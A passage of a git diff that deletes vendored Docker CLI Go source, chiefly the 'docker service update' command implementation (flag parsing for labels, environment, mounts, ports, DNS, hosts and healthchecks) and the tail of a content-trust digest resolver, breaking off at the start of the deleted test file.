-	// could be parsed as a digest reference. Specifying an image ID
-	// is valid but not resolvable. There is no warning message for
-	// an image ID because it's valid to use one.
-	if _, err := digest.ParseDigest(image); err == nil {
-		return nil
-	}
-
-	ref, err := reference.ParseNamed(image)
-	if err != nil {
-		return fmt.Errorf("Could not parse image reference %s", service.TaskTemplate.ContainerSpec.Image)
-	}
-	if _, ok := ref.(reference.Canonical); !ok {
-		ref = reference.WithDefaultTag(ref)
-
-		taggedRef, ok := ref.(reference.NamedTagged)
-		if !ok {
-			// This should never happen because a reference either
-			// has a digest, or WithDefaultTag would give it a tag.
-			return errors.New("Failed to resolve image digest using content trust: reference is missing a tag")
-		}
-
-		resolvedImage, err := trustedResolveDigest(context.Background(), dockerCli, taggedRef)
-		if err != nil {
-			return fmt.Errorf("Failed to resolve image digest using content trust: %v", err)
-		}
-		logrus.Debugf("resolved image tag to %s using content trust", resolvedImage.String())
-		service.TaskTemplate.ContainerSpec.Image = resolvedImage.String()
-	}
-	return nil
-}
-
-func trustedResolveDigest(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged) (distreference.Canonical, error) {
-	repoInfo, err := registry.ParseRepositoryInfo(ref)
-	if err != nil {
-		return nil, err
-	}
-
-	authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index)
-
-	notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull")
-	if err != nil {
-		return nil, errors.Wrap(err, "error establishing connection to trust repository")
-	}
-
-	t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole)
-	if err != nil {
-		return nil, trust.NotaryError(repoInfo.FullName(), err)
-	}
-	// Only get the tag if it's in the top level targets role or the releases delegation role
-	// ignore it if it's in any other delegation roles
-	if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole {
-		return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.String()))
-	}
-
-	logrus.Debugf("retrieving target for %s role\n", t.Role)
-	h, ok := t.Hashes["sha256"]
-	if !ok {
-		return nil, errors.New("no valid hash, expecting sha256")
-	}
-
-	dgst := digest.NewDigestFromHex("sha256", hex.EncodeToString(h))
-
-	// Using distribution reference package to make sure that adding a
-	// digest does not erase the tag. When the two reference packages
-	// are unified, this will no longer be an issue.
-	return distreference.WithDigest(ref, dgst)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/update.go b/vendor/github.com/docker/docker/cli/command/service/update.go
deleted file mode 100644
index d56de10913..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/update.go
+++ /dev/null
@@ -1,849 +0,0 @@
-package service
-
-import (
-	"fmt"
-	"sort"
-	"strings"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/container"
-	mounttypes "github.com/docker/docker/api/types/mount"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/client"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/docker/go-connections/nat"
-	shlex "github.com/flynn-archive/go-shlex"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-)
-
-func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	serviceOpts := newServiceOptions()
-
-	cmd := &cobra.Command{
-		Use:   "update [OPTIONS] SERVICE",
-		Short: "Update a service",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runUpdate(dockerCli, cmd.Flags(), args[0])
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.String("image", "", "Service image tag")
-	flags.String("args", "", "Service command args")
-	flags.Bool("rollback", false, "Rollback to previous specification")
-	flags.Bool("force", false, "Force update even if no changes require it")
-	addServiceFlags(cmd, serviceOpts)
-
-	flags.Var(newListOptsVar(), flagEnvRemove, "Remove an environment variable")
-	flags.Var(newListOptsVar(), flagGroupRemove, "Remove a previously added supplementary user group from the container")
-	flags.Var(newListOptsVar(), flagLabelRemove, "Remove a label by its key")
-	flags.Var(newListOptsVar(), flagContainerLabelRemove, "Remove a container label by its key")
-	flags.Var(newListOptsVar(), flagMountRemove, "Remove a mount by its target path")
-	// flags.Var(newListOptsVar().WithValidator(validatePublishRemove), flagPublishRemove, "Remove a published port by its target port")
-	flags.Var(&opts.PortOpt{}, flagPublishRemove, "Remove a published port by its target port")
-	flags.Var(newListOptsVar(), flagConstraintRemove, "Remove a constraint")
-	flags.Var(newListOptsVar(), flagDNSRemove, "Remove a custom DNS server")
-	flags.Var(newListOptsVar(), flagDNSOptionRemove, "Remove a DNS option")
-	flags.Var(newListOptsVar(), flagDNSSearchRemove, "Remove a DNS search domain")
-	flags.Var(newListOptsVar(), flagHostRemove, "Remove a custom host-to-IP mapping (host:ip)")
-	flags.Var(&serviceOpts.labels, flagLabelAdd, "Add or update a service label")
-	flags.Var(&serviceOpts.containerLabels, flagContainerLabelAdd, "Add or update a container label")
-	flags.Var(&serviceOpts.env, flagEnvAdd, "Add or update an environment variable")
-	flags.Var(newListOptsVar(), flagSecretRemove, "Remove a secret")
-	flags.Var(&serviceOpts.secrets, flagSecretAdd, "Add or update a secret on a service")
-	flags.Var(&serviceOpts.mounts, flagMountAdd, "Add or update a mount on a service")
-	flags.Var(&serviceOpts.constraints, flagConstraintAdd, "Add or update a placement constraint")
-	flags.Var(&serviceOpts.endpoint.publishPorts, flagPublishAdd, "Add or update a published port")
-	flags.Var(&serviceOpts.groups, flagGroupAdd, "Add an additional supplementary user group to the container")
-	flags.Var(&serviceOpts.dns, flagDNSAdd, "Add or update a custom DNS server")
-	flags.Var(&serviceOpts.dnsOption, flagDNSOptionAdd, "Add or update a DNS option")
-	flags.Var(&serviceOpts.dnsSearch, flagDNSSearchAdd, "Add or update a custom DNS search domain")
-	flags.Var(&serviceOpts.hosts, flagHostAdd, "Add or update a custom host-to-IP mapping (host:ip)")
-
-	return cmd
-}
-
-func newListOptsVar() *opts.ListOpts {
-	return opts.NewListOptsRef(&[]string{}, nil)
-}
-
-func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, serviceID string) error {
-	apiClient := dockerCli.Client()
-	ctx := context.Background()
-	updateOpts := types.ServiceUpdateOptions{}
-
-	service, _, err := apiClient.ServiceInspectWithRaw(ctx, serviceID)
-	if err != nil {
-		return err
-	}
-
-	rollback, err := flags.GetBool("rollback")
-	if err != nil {
-		return err
-	}
-
-	spec := &service.Spec
-	if rollback {
-		spec = service.PreviousSpec
-		if spec == nil {
-			return fmt.Errorf("service does not have a previous specification to roll back to")
-		}
-	}
-
-	err = updateService(flags, spec)
-	if err != nil {
-		return err
-	}
-
-	if flags.Changed("image") {
-		if err := resolveServiceImageDigest(dockerCli, spec); err != nil {
-			return err
-		}
-	}
-
-	updatedSecrets, err := getUpdatedSecrets(apiClient, flags, spec.TaskTemplate.ContainerSpec.Secrets)
-	if err != nil {
-		return err
-	}
-
-	spec.TaskTemplate.ContainerSpec.Secrets = updatedSecrets
-
-	// only send auth if flag was set
-	sendAuth, err := flags.GetBool(flagRegistryAuth)
-	if err != nil {
-		return err
-	}
-	if sendAuth {
-		// Retrieve encoded auth token from the image reference
-		// This would be the old image if it didn't change in this update
-		image := spec.TaskTemplate.ContainerSpec.Image
-		encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, image)
-		if err != nil {
-			return err
-		}
-		updateOpts.EncodedRegistryAuth = encodedAuth
-	} else if rollback {
-		updateOpts.RegistryAuthFrom = types.RegistryAuthFromPreviousSpec
-	} else {
-		updateOpts.RegistryAuthFrom = types.RegistryAuthFromSpec
-	}
-
-	response, err := apiClient.ServiceUpdate(ctx, service.ID, service.Version, *spec, updateOpts)
-	if err != nil {
-		return err
-	}
-
-	for _, warning := range response.Warnings {
-		fmt.Fprintln(dockerCli.Err(), warning)
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "%s\n", serviceID)
-	return nil
-}
-
-func updateService(flags *pflag.FlagSet, spec *swarm.ServiceSpec) error {
-	updateString := func(flag string, field *string) {
-		if flags.Changed(flag) {
-			*field, _ = flags.GetString(flag)
-		}
-	}
-
-	updateInt64Value := func(flag string, field *int64) {
-		if flags.Changed(flag) {
-			*field = flags.Lookup(flag).Value.(int64Value).Value()
-		}
-	}
-
-	updateFloatValue := func(flag string, field *float32) {
-		if flags.Changed(flag) {
-			*field = flags.Lookup(flag).Value.(*floatValue).Value()
-		}
-	}
-
-	updateDuration := func(flag string, field *time.Duration) {
-		if flags.Changed(flag) {
-			*field, _ = flags.GetDuration(flag)
-		}
-	}
-
-	updateDurationOpt := func(flag string, field **time.Duration) {
-		if flags.Changed(flag) {
-			val := *flags.Lookup(flag).Value.(*DurationOpt).Value()
-			*field = &val
-		}
-	}
-
-	updateUint64 := func(flag string, field *uint64) {
-		if flags.Changed(flag) {
-			*field, _ = flags.GetUint64(flag)
-		}
-	}
-
-	updateUint64Opt := func(flag string, field **uint64) {
-		if flags.Changed(flag) {
-			val := *flags.Lookup(flag).Value.(*Uint64Opt).Value()
-			*field = &val
-		}
-	}
-
-	cspec := &spec.TaskTemplate.ContainerSpec
-	task := &spec.TaskTemplate
-
-	taskResources := func() *swarm.ResourceRequirements {
-		if task.Resources == nil {
-			task.Resources = &swarm.ResourceRequirements{}
-		}
-		return task.Resources
-	}
-
-	updateLabels(flags, &spec.Labels)
-	updateContainerLabels(flags, &cspec.Labels)
-	updateString("image", &cspec.Image)
-	updateStringToSlice(flags, "args", &cspec.Args)
-	updateEnvironment(flags, &cspec.Env)
-	updateString(flagWorkdir, &cspec.Dir)
-	updateString(flagUser, &cspec.User)
-	updateString(flagHostname, &cspec.Hostname)
-	if err := updateMounts(flags, &cspec.Mounts); err != nil {
-		return err
-	}
-
-	if flags.Changed(flagLimitCPU) || flags.Changed(flagLimitMemory) {
-		taskResources().Limits = &swarm.Resources{}
-		updateInt64Value(flagLimitCPU, &task.Resources.Limits.NanoCPUs)
-		updateInt64Value(flagLimitMemory, &task.Resources.Limits.MemoryBytes)
-	}
-	if flags.Changed(flagReserveCPU) || flags.Changed(flagReserveMemory) {
-		taskResources().Reservations = &swarm.Resources{}
-		updateInt64Value(flagReserveCPU, &task.Resources.Reservations.NanoCPUs)
-		updateInt64Value(flagReserveMemory, &task.Resources.Reservations.MemoryBytes)
-	}
-
-	updateDurationOpt(flagStopGracePeriod, &cspec.StopGracePeriod)
-
-	if anyChanged(flags, flagRestartCondition, flagRestartDelay, flagRestartMaxAttempts, flagRestartWindow) {
-		if task.RestartPolicy == nil {
-			task.RestartPolicy = &swarm.RestartPolicy{}
-		}
-
-		if flags.Changed(flagRestartCondition) {
-			value, _ := flags.GetString(flagRestartCondition)
-			task.RestartPolicy.Condition = swarm.RestartPolicyCondition(value)
-		}
-		updateDurationOpt(flagRestartDelay, &task.RestartPolicy.Delay)
-		updateUint64Opt(flagRestartMaxAttempts, &task.RestartPolicy.MaxAttempts)
-		updateDurationOpt(flagRestartWindow, &task.RestartPolicy.Window)
-	}
-
-	if anyChanged(flags, flagConstraintAdd, flagConstraintRemove) {
-		if task.Placement == nil {
-			task.Placement = &swarm.Placement{}
-		}
-		updatePlacement(flags, task.Placement)
-	}
-
-	if err := updateReplicas(flags, &spec.Mode); err != nil {
-		return err
-	}
-
-	if anyChanged(flags, flagUpdateParallelism, flagUpdateDelay, flagUpdateMonitor, flagUpdateFailureAction, flagUpdateMaxFailureRatio) {
-		if spec.UpdateConfig == nil {
-			spec.UpdateConfig = &swarm.UpdateConfig{}
-		}
-		updateUint64(flagUpdateParallelism, &spec.UpdateConfig.Parallelism)
-		updateDuration(flagUpdateDelay, &spec.UpdateConfig.Delay)
-		updateDuration(flagUpdateMonitor, &spec.UpdateConfig.Monitor)
-		updateString(flagUpdateFailureAction, &spec.UpdateConfig.FailureAction)
-		updateFloatValue(flagUpdateMaxFailureRatio, &spec.UpdateConfig.MaxFailureRatio)
-	}
-
-	if flags.Changed(flagEndpointMode) {
-		value, _ := flags.GetString(flagEndpointMode)
-		if spec.EndpointSpec == nil {
-			spec.EndpointSpec = &swarm.EndpointSpec{}
-		}
-		spec.EndpointSpec.Mode = swarm.ResolutionMode(value)
-	}
-
-	if anyChanged(flags, flagGroupAdd, flagGroupRemove) {
-		if err := updateGroups(flags, &cspec.Groups); err != nil {
-			return err
-		}
-	}
-
-	if anyChanged(flags, flagPublishAdd, flagPublishRemove) {
-		if spec.EndpointSpec == nil {
-			spec.EndpointSpec = &swarm.EndpointSpec{}
-		}
-		if err := updatePorts(flags, &spec.EndpointSpec.Ports); err != nil {
-			return err
-		}
-	}
-
-	if anyChanged(flags, flagDNSAdd, flagDNSRemove, flagDNSOptionAdd, flagDNSOptionRemove, flagDNSSearchAdd, flagDNSSearchRemove) {
-		if cspec.DNSConfig == nil {
-			cspec.DNSConfig = &swarm.DNSConfig{}
-		}
-		if err := updateDNSConfig(flags, &cspec.DNSConfig); err != nil {
-			return err
-		}
-	}
-
-	if anyChanged(flags, flagHostAdd, flagHostRemove) {
-		if err := updateHosts(flags, &cspec.Hosts); err != nil {
-			return err
-		}
-	}
-
-	if err := updateLogDriver(flags, &spec.TaskTemplate); err != nil {
-		return err
-	}
-
-	force, err := flags.GetBool("force")
-	if err != nil {
-		return err
-	}
-
-	if force {
-		spec.TaskTemplate.ForceUpdate++
-	}
-
-	if err := updateHealthcheck(flags, cspec); err != nil {
-		return err
-	}
-
-	if flags.Changed(flagTTY) {
-		tty, err := flags.GetBool(flagTTY)
-		if err != nil {
-			return err
-		}
-		cspec.TTY = tty
-	}
-
-	return nil
-}
-
-func updateStringToSlice(flags *pflag.FlagSet, flag string, field *[]string) error {
-	if !flags.Changed(flag) {
-		return nil
-	}
-
-	value, _ := flags.GetString(flag)
-	valueSlice, err := shlex.Split(value)
-	*field = valueSlice
-	return err
-}
-
-func anyChanged(flags *pflag.FlagSet, fields ...string) bool {
-	for _, flag := range fields {
-		if flags.Changed(flag) {
-			return true
-		}
-	}
-	return false
-}
-
-func updatePlacement(flags *pflag.FlagSet, placement *swarm.Placement) {
-	if flags.Changed(flagConstraintAdd) {
-		values := flags.Lookup(flagConstraintAdd).Value.(*opts.ListOpts).GetAll()
-		placement.Constraints = append(placement.Constraints, values...)
-	}
-	toRemove := buildToRemoveSet(flags, flagConstraintRemove)
-
-	newConstraints := []string{}
-	for _, constraint := range placement.Constraints {
-		if _, exists := toRemove[constraint]; !exists {
-			newConstraints = append(newConstraints, constraint)
-		}
-	}
-	// Sort so that result is predictable.
-	sort.Strings(newConstraints)
-
-	placement.Constraints = newConstraints
-}
-
-func updateContainerLabels(flags *pflag.FlagSet, field *map[string]string) {
-	if flags.Changed(flagContainerLabelAdd) {
-		if *field == nil {
-			*field = map[string]string{}
-		}
-
-		values := flags.Lookup(flagContainerLabelAdd).Value.(*opts.ListOpts).GetAll()
-		for key, value := range runconfigopts.ConvertKVStringsToMap(values) {
-			(*field)[key] = value
-		}
-	}
-
-	if *field != nil && flags.Changed(flagContainerLabelRemove) {
-		toRemove := flags.Lookup(flagContainerLabelRemove).Value.(*opts.ListOpts).GetAll()
-		for _, label := range toRemove {
-			delete(*field, label)
-		}
-	}
-}
-
-func updateLabels(flags *pflag.FlagSet, field *map[string]string) {
-	if flags.Changed(flagLabelAdd) {
-		if *field == nil {
-			*field = map[string]string{}
-		}
-
-		values := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll()
-		for key, value := range runconfigopts.ConvertKVStringsToMap(values) {
-			(*field)[key] = value
-		}
-	}
-
-	if *field != nil && flags.Changed(flagLabelRemove) {
-		toRemove := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll()
-		for _, label := range toRemove {
-			delete(*field, label)
-		}
-	}
-}
-
-func updateEnvironment(flags *pflag.FlagSet, field *[]string) {
-	envSet := map[string]string{}
-	for _, v := range *field {
-		envSet[envKey(v)] = v
-	}
-	if flags.Changed(flagEnvAdd) {
-		value := flags.Lookup(flagEnvAdd).Value.(*opts.ListOpts)
-		for _, v := range value.GetAll() {
-			envSet[envKey(v)] = v
-		}
-	}
-
-	*field = []string{}
-	for _, v := range envSet {
-		*field = append(*field, v)
-	}
-
-	toRemove := buildToRemoveSet(flags, flagEnvRemove)
-	*field = removeItems(*field, toRemove, envKey)
-}
-
-func getUpdatedSecrets(apiClient client.SecretAPIClient, flags *pflag.FlagSet, secrets []*swarm.SecretReference) ([]*swarm.SecretReference, error) {
-	if flags.Changed(flagSecretAdd) {
-		values := flags.Lookup(flagSecretAdd).Value.(*opts.SecretOpt).Value()
-
-		addSecrets, err := ParseSecrets(apiClient, values)
-		if err != nil {
-			return nil, err
-		}
-		secrets = append(secrets, addSecrets...)
-	}
-	toRemove := buildToRemoveSet(flags, flagSecretRemove)
-	newSecrets := []*swarm.SecretReference{}
-	for _, secret := range secrets {
-		if _, exists := toRemove[secret.SecretName]; !exists {
-			newSecrets = append(newSecrets, secret)
-		}
-	}
-
-	return newSecrets, nil
-}
-
-func envKey(value string) string {
-	kv := strings.SplitN(value, "=", 2)
-	return kv[0]
-}
-
-func itemKey(value string) string {
-	return value
-}
-
-func buildToRemoveSet(flags *pflag.FlagSet, flag string) map[string]struct{} {
-	var empty struct{}
-	toRemove := make(map[string]struct{})
-
-	if !flags.Changed(flag) {
-		return toRemove
-	}
-
-	toRemoveSlice := flags.Lookup(flag).Value.(*opts.ListOpts).GetAll()
-	for _, key := range toRemoveSlice {
-		toRemove[key] = empty
-	}
-	return toRemove
-}
-
-func removeItems(
-	seq []string,
-	toRemove map[string]struct{},
-	keyFunc func(string) string,
-) []string {
-	newSeq := []string{}
-	for _, item := range seq {
-		if _, exists := toRemove[keyFunc(item)]; !exists {
-			newSeq = append(newSeq, item)
-		}
-	}
-	return newSeq
-}
-
-type byMountSource []mounttypes.Mount
-
-func (m byMountSource) Len() int      { return len(m) }
-func (m byMountSource) Swap(i, j int) { m[i], m[j] = m[j], m[i] }
-func (m byMountSource) Less(i, j int) bool {
-	a, b := m[i], m[j]
-
-	if a.Source == b.Source {
-		return a.Target < b.Target
-	}
-
-	return a.Source < b.Source
-}
-
-func updateMounts(flags *pflag.FlagSet, mounts *[]mounttypes.Mount) error {
-
-	mountsByTarget := map[string]mounttypes.Mount{}
-
-	if flags.Changed(flagMountAdd) {
-		values := flags.Lookup(flagMountAdd).Value.(*opts.MountOpt).Value()
-		for _, mount := range values {
-			if _, ok := mountsByTarget[mount.Target]; ok {
-				return fmt.Errorf("duplicate mount target")
-			}
-			mountsByTarget[mount.Target] = mount
-		}
-	}
-
-	// Add old list of mount points minus updated one.
-	for _, mount := range *mounts {
-		if _, ok := mountsByTarget[mount.Target]; !ok {
-			mountsByTarget[mount.Target] = mount
-		}
-	}
-
-	newMounts := []mounttypes.Mount{}
-
-	toRemove := buildToRemoveSet(flags, flagMountRemove)
-
-	for _, mount := range mountsByTarget {
-		if _, exists := toRemove[mount.Target]; !exists {
-			newMounts = append(newMounts, mount)
-		}
-	}
-	sort.Sort(byMountSource(newMounts))
-	*mounts = newMounts
-	return nil
-}
-
-func updateGroups(flags *pflag.FlagSet, groups *[]string) error {
-	if flags.Changed(flagGroupAdd) {
-		values := flags.Lookup(flagGroupAdd).Value.(*opts.ListOpts).GetAll()
-		*groups = append(*groups, values...)
-	}
-	toRemove := buildToRemoveSet(flags, flagGroupRemove)
-
-	newGroups := []string{}
-	for _, group := range *groups {
-		if _, exists := toRemove[group]; !exists {
-			newGroups = append(newGroups, group)
-		}
-	}
-	// Sort so that result is predictable.
-	sort.Strings(newGroups)
-
-	*groups = newGroups
-	return nil
-}
-
-func removeDuplicates(entries []string) []string {
-	hit := map[string]bool{}
-	newEntries := []string{}
-	for _, v := range entries {
-		if !hit[v] {
-			newEntries = append(newEntries, v)
-			hit[v] = true
-		}
-	}
-	return newEntries
-}
-
-func updateDNSConfig(flags *pflag.FlagSet, config **swarm.DNSConfig) error {
-	newConfig := &swarm.DNSConfig{}
-
-	nameservers := (*config).Nameservers
-	if flags.Changed(flagDNSAdd) {
-		values := flags.Lookup(flagDNSAdd).Value.(*opts.ListOpts).GetAll()
-		nameservers = append(nameservers, values...)
-	}
-	nameservers = removeDuplicates(nameservers)
-	toRemove := buildToRemoveSet(flags, flagDNSRemove)
-	for _, nameserver := range nameservers {
-		if _, exists := toRemove[nameserver]; !exists {
-			newConfig.Nameservers = append(newConfig.Nameservers, nameserver)
-
-		}
-	}
-	// Sort so that result is predictable.
-	sort.Strings(newConfig.Nameservers)
-
-	search := (*config).Search
-	if flags.Changed(flagDNSSearchAdd) {
-		values := flags.Lookup(flagDNSSearchAdd).Value.(*opts.ListOpts).GetAll()
-		search = append(search, values...)
-	}
-	search = removeDuplicates(search)
-	toRemove = buildToRemoveSet(flags, flagDNSSearchRemove)
-	for _, entry := range search {
-		if _, exists := toRemove[entry]; !exists {
-			newConfig.Search = append(newConfig.Search, entry)
-		}
-	}
-	// Sort so that result is predictable.
-	sort.Strings(newConfig.Search)
-
-	options := (*config).Options
-	if flags.Changed(flagDNSOptionAdd) {
-		values := flags.Lookup(flagDNSOptionAdd).Value.(*opts.ListOpts).GetAll()
-		options = append(options, values...)
-	}
-	options = removeDuplicates(options)
-	toRemove = buildToRemoveSet(flags, flagDNSOptionRemove)
-	for _, option := range options {
-		if _, exists := toRemove[option]; !exists {
-			newConfig.Options = append(newConfig.Options, option)
-		}
-	}
-	// Sort so that result is predictable.
-	sort.Strings(newConfig.Options)
-
-	*config = newConfig
-	return nil
-}
-
-type byPortConfig []swarm.PortConfig
-
-func (r byPortConfig) Len() int      { return len(r) }
-func (r byPortConfig) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
-func (r byPortConfig) Less(i, j int) bool {
-	// We convert PortConfig into `port/protocol`, e.g., `80/tcp`
-	// In updatePorts we already filter out with map so there is duplicate entries
-	return portConfigToString(&r[i]) < portConfigToString(&r[j])
-}
-
-func portConfigToString(portConfig *swarm.PortConfig) string {
-	protocol := portConfig.Protocol
-	mode := portConfig.PublishMode
-	return fmt.Sprintf("%v:%v/%s/%s", portConfig.PublishedPort, portConfig.TargetPort, protocol, mode)
-}
-
-// FIXME(vdemeester) port to opts.PortOpt
-// This validation is only used for `--publish-rm`.
-// The `--publish-rm` takes:
-// <TargetPort>[/<Protocol>] (e.g., 80, 80/tcp, 53/udp)
-func validatePublishRemove(val string) (string, error) {
-	proto, port := nat.SplitProtoPort(val)
-	if proto != "tcp" && proto != "udp" {
-		return "", fmt.Errorf("invalid protocol '%s' for %s", proto, val)
-	}
-	if strings.Contains(port, ":") {
-		return "", fmt.Errorf("invalid port format: '%s', should be <TargetPort>[/<Protocol>] (e.g., 80, 80/tcp, 53/udp)", port)
-	}
-	if _, err := nat.ParsePort(port); err != nil {
-		return "", err
-	}
-	return val, nil
-}
-
-func updatePorts(flags *pflag.FlagSet, portConfig *[]swarm.PortConfig) error {
-	// The key of the map is `port/protocol`, e.g., `80/tcp`
-	portSet := map[string]swarm.PortConfig{}
-
-	// Build the current list of portConfig
-	for _, entry := range *portConfig {
-		if _, ok := portSet[portConfigToString(&entry)]; !ok {
-			portSet[portConfigToString(&entry)] = entry
-		}
-	}
-
-	newPorts := []swarm.PortConfig{}
-
-	// Clean current ports
-	toRemove := flags.Lookup(flagPublishRemove).Value.(*opts.PortOpt).Value()
-portLoop:
-	for _, port := range portSet {
-		for _, pConfig := range toRemove {
-			if equalProtocol(port.Protocol, pConfig.Protocol) &&
-				port.TargetPort == pConfig.TargetPort &&
-				equalPublishMode(port.PublishMode, pConfig.PublishMode) {
-				continue portLoop
-			}
-		}
-
-		newPorts = append(newPorts, port)
-	}
-
-	// Check to see if there are any conflict in flags.
-	if flags.Changed(flagPublishAdd) {
-		ports := flags.Lookup(flagPublishAdd).Value.(*opts.PortOpt).Value()
-
-		for _, port := range ports {
-			if v, ok := portSet[portConfigToString(&port)]; ok {
-				if v != port {
-					fmt.Println("v", v)
-					return fmt.Errorf("conflicting port mapping between %v:%v/%s and %v:%v/%s", port.PublishedPort, port.TargetPort, port.Protocol, v.PublishedPort, v.TargetPort, v.Protocol)
-				}
-				continue
-			}
-			//portSet[portConfigToString(&port)] = port
-			newPorts = append(newPorts, port)
-		}
-	}
-
-	// Sort the PortConfig to avoid unnecessary updates
-	sort.Sort(byPortConfig(newPorts))
-	*portConfig = newPorts
-	return nil
-}
-
-func equalProtocol(prot1, prot2 swarm.PortConfigProtocol) bool {
-	return prot1 == prot2 ||
-		(prot1 == swarm.PortConfigProtocol("") && prot2 == swarm.PortConfigProtocolTCP) ||
-		(prot2 == swarm.PortConfigProtocol("") && prot1 == swarm.PortConfigProtocolTCP)
-}
-
-func equalPublishMode(mode1, mode2 swarm.PortConfigPublishMode) bool {
-	return mode1 == mode2 ||
-		(mode1 == swarm.PortConfigPublishMode("") && mode2 == swarm.PortConfigPublishModeIngress) ||
-		(mode2 == swarm.PortConfigPublishMode("") && mode1 == swarm.PortConfigPublishModeIngress)
-}
-
-func equalPort(targetPort nat.Port, port swarm.PortConfig) bool {
-	return (string(port.Protocol) == targetPort.Proto() &&
-		port.TargetPort == uint32(targetPort.Int()))
-}
-
-func updateReplicas(flags *pflag.FlagSet, serviceMode *swarm.ServiceMode) error {
-	if !flags.Changed(flagReplicas) {
-		return nil
-	}
-
-	if serviceMode == nil || serviceMode.Replicated == nil {
-		return fmt.Errorf("replicas can only be used with replicated mode")
-	}
-	serviceMode.Replicated.Replicas = flags.Lookup(flagReplicas).Value.(*Uint64Opt).Value()
-	return nil
-}
-
-func updateHosts(flags *pflag.FlagSet, hosts *[]string) error {
-	// Combine existing Hosts (in swarmkit format) with the host to add (convert to swarmkit format)
-	if flags.Changed(flagHostAdd) {
-		values := convertExtraHostsToSwarmHosts(flags.Lookup(flagHostAdd).Value.(*opts.ListOpts).GetAll())
-		*hosts = append(*hosts, values...)
-	}
-	// Remove duplicate
-	*hosts = removeDuplicates(*hosts)
-
-	keysToRemove := make(map[string]struct{})
-	if flags.Changed(flagHostRemove) {
-		var empty struct{}
-		extraHostsToRemove := flags.Lookup(flagHostRemove).Value.(*opts.ListOpts).GetAll()
-		for _, entry := range extraHostsToRemove {
-			key := strings.SplitN(entry, ":", 2)[0]
-			keysToRemove[key] = empty
-		}
-	}
-
-	newHosts := []string{}
-	for _, entry := range *hosts {
-		// Since this is in swarmkit format, we need to find the key, which is canonical_hostname of:
-		// IP_address canonical_hostname [aliases...]
-		parts := strings.Fields(entry)
-		if len(parts) > 1 {
-			key := parts[1]
-			if _, exists := keysToRemove[key]; !exists {
-				newHosts = append(newHosts, entry)
-			}
-		} else {
-			newHosts = append(newHosts, entry)
-		}
-	}
-
-	// Sort so that result is predictable.
-	sort.Strings(newHosts)
-
-	*hosts = newHosts
-	return nil
-}
-
-// updateLogDriver updates the log driver only if the log driver flag is set.
-// All options will be replaced with those provided on the command line.
-func updateLogDriver(flags *pflag.FlagSet, taskTemplate *swarm.TaskSpec) error {
-	if !flags.Changed(flagLogDriver) {
-		return nil
-	}
-
-	name, err := flags.GetString(flagLogDriver)
-	if err != nil {
-		return err
-	}
-
-	if name == "" {
-		return nil
-	}
-
-	taskTemplate.LogDriver = &swarm.Driver{
-		Name:    name,
-		Options: runconfigopts.ConvertKVStringsToMap(flags.Lookup(flagLogOpt).Value.(*opts.ListOpts).GetAll()),
-	}
-
-	return nil
-}
-
-func updateHealthcheck(flags *pflag.FlagSet, containerSpec *swarm.ContainerSpec) error {
-	if !anyChanged(flags, flagNoHealthcheck, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) {
-		return nil
-	}
-	if containerSpec.Healthcheck == nil {
-		containerSpec.Healthcheck = &container.HealthConfig{}
-	}
-	noHealthcheck, err := flags.GetBool(flagNoHealthcheck)
-	if err != nil {
-		return err
-	}
-	if noHealthcheck {
-		if !anyChanged(flags, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) {
-			containerSpec.Healthcheck = &container.HealthConfig{
-				Test: []string{"NONE"},
-			}
-			return nil
-		}
-		return fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck)
-	}
-	if len(containerSpec.Healthcheck.Test) > 0 && containerSpec.Healthcheck.Test[0] == "NONE" {
-		containerSpec.Healthcheck.Test = nil
-	}
-	if flags.Changed(flagHealthInterval) {
-		val := *flags.Lookup(flagHealthInterval).Value.(*PositiveDurationOpt).Value()
-		containerSpec.Healthcheck.Interval = val
-	}
-	if flags.Changed(flagHealthTimeout) {
-		val := *flags.Lookup(flagHealthTimeout).Value.(*PositiveDurationOpt).Value()
-		containerSpec.Healthcheck.Timeout = val
-	}
-	if flags.Changed(flagHealthRetries) {
-		containerSpec.Healthcheck.Retries, _ = flags.GetInt(flagHealthRetries)
-	}
-	if flags.Changed(flagHealthCmd) {
-		cmd, _ := flags.GetString(flagHealthCmd)
-		if cmd != "" {
-			containerSpec.Healthcheck.Test = []string{"CMD-SHELL", cmd}
-		} else {
-			containerSpec.Healthcheck.Test = nil
-		}
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/update_test.go b/vendor/github.com/docker/docker/cli/command/service/update_test.go
deleted file mode 100644
index 08fe248769..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/update_test.go
+++ /dev/null
@@ -1,384 +0,0 @@
-package service
-
-import (
-	"reflect"
-	"sort"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/api/types/container"
-	mounttypes "github.com/docker/docker/api/types/mount"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestUpdateServiceArgs(t *testing.T) {
